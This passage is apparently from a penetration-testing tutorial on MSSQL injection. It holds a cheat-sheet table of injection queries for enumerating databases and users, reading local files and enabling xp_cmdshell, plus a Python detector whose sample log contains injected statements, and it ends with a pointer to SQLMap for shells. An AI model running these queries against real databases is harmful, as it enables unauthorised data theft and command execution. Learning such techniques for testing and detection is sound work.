After finding the injection point and determining the exact number of columns, we can use the following basic queries to demonstrate a proof of concept for the vulnerability.

| Function | Query | Remarks |
|---|---|---|
| Database version | SELECT @@version | |
| Host name | SELECT host_name() | |
| Current database | SELECT DB_NAME() | |
| Current user | SELECT system_user; SELECT user; SELECT user_name() | |
| List users | SELECT name FROM master..syslogins | |
| List databases | SELECT name FROM master..sysdatabases; SELECT DB_NAME(*) | * = 1, 2, 3, ... |
| Get tables from current database | SELECT table_name FROM information_schema.tables; | |
| Get tables from other database | SELECT name FROM other_database..sysobjects WHERE xtype = 'U'-- | |
| Get columns from current DB's table | SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name'; | |
| Get columns from other DB's table | SELECT other_database..syscolumns.name, TYPE_NAME(other_database..syscolumns.xtype) FROM other_database..syscolumns, other_database..sysobjects WHERE other_database..syscolumns.id = other_database..sysobjects.id AND other_database..sysobjects.name = 'other_table' | |
| Extract data | SELECT column_name FROM table_name | |
| Extract data from another database | SELECT other_column_name FROM other_database..other_table | |
| Create user | EXEC sp_addlogin 'user', 'pass'; | Requires privileges |
| Location of database files | EXEC sp_helpdb master; EXEC sp_helpdb pubs; | |
| Local file access | BULK INSERT mydata FROM 'c:\boot.ini'; | |
| Command execution | EXEC sp_configure 'xp_cmdshell', 1; | Requires privileges |



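From the defender's side, the same query families are what you want to flag in application or proxy SQL logs. The following added example (not from the original post) classifies logged statements by the MSSQL patterns listed above; the log lines and severity labels are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample of an application-side SQL query log (one statement per
# line). The injected tails mirror the query families in the table above.
SAMPLE_LOG = """\
SELECT name, price FROM products WHERE id = 42
SELECT name, price FROM products WHERE id = 42 UNION SELECT @@version, NULL
SELECT name, price FROM products WHERE id = 42 UNION SELECT name, NULL FROM master..syslogins
SELECT name, price FROM products WHERE id = 42 UNION SELECT DB_NAME(3), NULL
SELECT name, price FROM products WHERE id = 42 UNION SELECT name, NULL FROM other_database..sysobjects WHERE xtype = 'U'--
SELECT name, price FROM products WHERE id = 42; EXEC sp_configure 'xp_cmdshell', 1;--
SELECT name, price FROM products WHERE id = 42; BULK INSERT mydata FROM 'c:\\boot.ini';--
SELECT customer_name FROM orders WHERE order_id = 7
"""

# Rules are checked in this order, so the most severe matching label wins.
RULES = [
    ("privileged", "high", re.compile(
        r"\bxp_cmdshell\b|\bsp_configure\b|\bsp_addlogin\b|\bBULK\s+INSERT\b|\bsp_helpdb\b", re.I)),
    ("enumeration", "medium", re.compile(
        r"\bmaster\.\.sys(logins|databases)\b|\binformation_schema\.(tables|columns)\b"
        r"|\.\.sys(objects|columns)\b|\bDB_NAME\(\s*\d+\s*\)", re.I)),
    ("fingerprint", "low", re.compile(
        r"@@version|\bhost_name\(\)|\bsystem_user\b|\buser_name\(\)|\bDB_NAME\(\s*\)", re.I)),
]

@dataclass
class Finding:
    line_no: int
    label: str
    severity: str
    statement: str

def scan_log(text: str) -> list[Finding]:
    """Return one Finding per log line whose statement matches a rule."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for label, severity, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(line_no, label, severity, line.strip()))
                break  # first (most severe) rule wins for this line
    return findings

def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per severity, e.g. {'high': 2, 'medium': 3, 'low': 1}."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: [{f.severity}] {f.label}: {f.statement}")
    print(summarize(scan_log(SAMPLE_LOG)))
```

A single "high" hit such as sp_configure or BULK INSERT in an application's query stream is worth an alert on its own; the "low" fingerprinting hits are mainly useful for reconstructing the timeline once the higher ones fire.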
For further exploitation, such as extracting data from the database or obtaining an OS shell, you can use the SQLMap tool.
